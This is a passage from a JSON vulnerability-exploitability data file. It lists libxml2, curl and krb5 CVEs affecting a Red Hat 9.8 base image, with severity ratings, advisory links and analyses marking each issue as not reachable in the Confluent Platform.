      "description": "A flaw was found in libxml2, an XML parsing library. This uncontrolled recursion vulnerability occurs in the xmlCatalogXMLResolveURI function when an XML catalog contains a delegate URI entry that references itself. A remote attacker could exploit this configuration-dependent issue by providing a specially crafted XML catalog, leading to infinite recursion and call stack exhaustion. This ultimately results in a segmentation fault, causing a Denial of Service (DoS) by crashing affected applications.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0990"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7519"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0990"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429959"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/1018"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0990"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7974-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0990"
        }
      ],
      "published": "2026-01-15T15:15:52+00:00",
      "updated": "2026-06-30T20:18:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.9.13-14.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-0992",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        400
      ],
      "description": "A flaw was found in the libxml2 library. This uncontrolled resource consumption vulnerability occurs when processing XML catalogs that contain repeated <nextCatalog> elements pointing to the same downstream catalog. A remote attacker can exploit this by supplying crafted catalogs, causing the parser to redundantly traverse catalog chains. This leads to excessive CPU consumption and degrades application availability, resulting in a denial-of-service condition.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0992"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7519"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0992"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429975"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/1019"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0992"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7974-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0992"
        }
      ],
      "published": "2026-01-15T15:15:52+00:00",
      "updated": "2026-06-30T20:17:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.9.13-14.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-11352",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        835
      ],
      "description": "An issue in curl\u2019s QUIC UDP receive function allows a malicious HTTP/3 server\nto trigger a remote denial of service against a curl or libcurl client.\nBecause the helper function discards zero-length UDP datagrams before counting\nthem toward the per-call packet budget, a connected QUIC peer can continuously\nstream empty datagrams to indefinitely stall the client.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-11352"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-11352"
        },
        {
          "url": "https://curl.se/L7HzKXisfJ/CVE-2026-11352.md"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-11352.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-11352.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-qxwx-hr5v-h5q4"
        },
        {
          "url": "https://hackerone.com/reports/3783438"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11352"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8525-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-11352"
        }
      ],
      "published": "2026-07-03T07:16:23+00:00",
      "updated": "2026-07-07T18:01:19+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-11586",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        770
      ],
      "description": "By default, curl automatically responds to WebSocket PING frames. Because curl\nlacks an upper bound on memory allocation for unacknowledged frames, a\nmalicious server can exhaust all available memory by flooding curl with rapid,\nsequential PING messages.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-11586"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-11586"
        },
        {
          "url": "https://curl.se/L7HzKXisfJ/CVE-2026-11586.md"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-11586.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-11586.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-c68q-h477-5646"
        },
        {
          "url": "https://hackerone.com/reports/3788931"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11586"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8525-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-11586"
        }
      ],
      "published": "2026-07-03T07:16:23+00:00",
      "updated": "2026-07-07T17:59:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-11850",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        191
      ],
      "description": "An integer underflow vulnerability was found in MIT krb5 in the berval2tl_data() function in plugins/kdb/ldap/libkdb_ldap/ldap_principal2.c. The function performs an unsigned subtraction (bv_len - 2) without a prior bounds check. When bv_len is 0 or 1, the subtraction wraps to a large value which is then truncated to uint16_t, yielding 0xFFFE (65534) or 0xFFFF (65535). The subsequent malloc succeeds and memcpy reads up to 65534 bytes from a 0-1 byte buffer, resulting in a heap out-of-bounds read.\nThe attack vector involves a malicious or compromised LDAP KDB backend returning a krbExtraData attribute with bv_len < 2, triggering the underflow when the KDC or kadmind reads principal data.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-11850"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25520"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-11850"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2459970"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11850"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8585-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-11850"
        }
      ],
      "published": "2026-06-11T10:16:21+00:00",
      "updated": "2026-06-17T10:14:30+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.21.1-10.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/krb5-pkinit@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.21.1-10.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/krb5-workstation@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.21.1-10.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libkadm5@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.21.1-10.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/krb5-pkinit@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
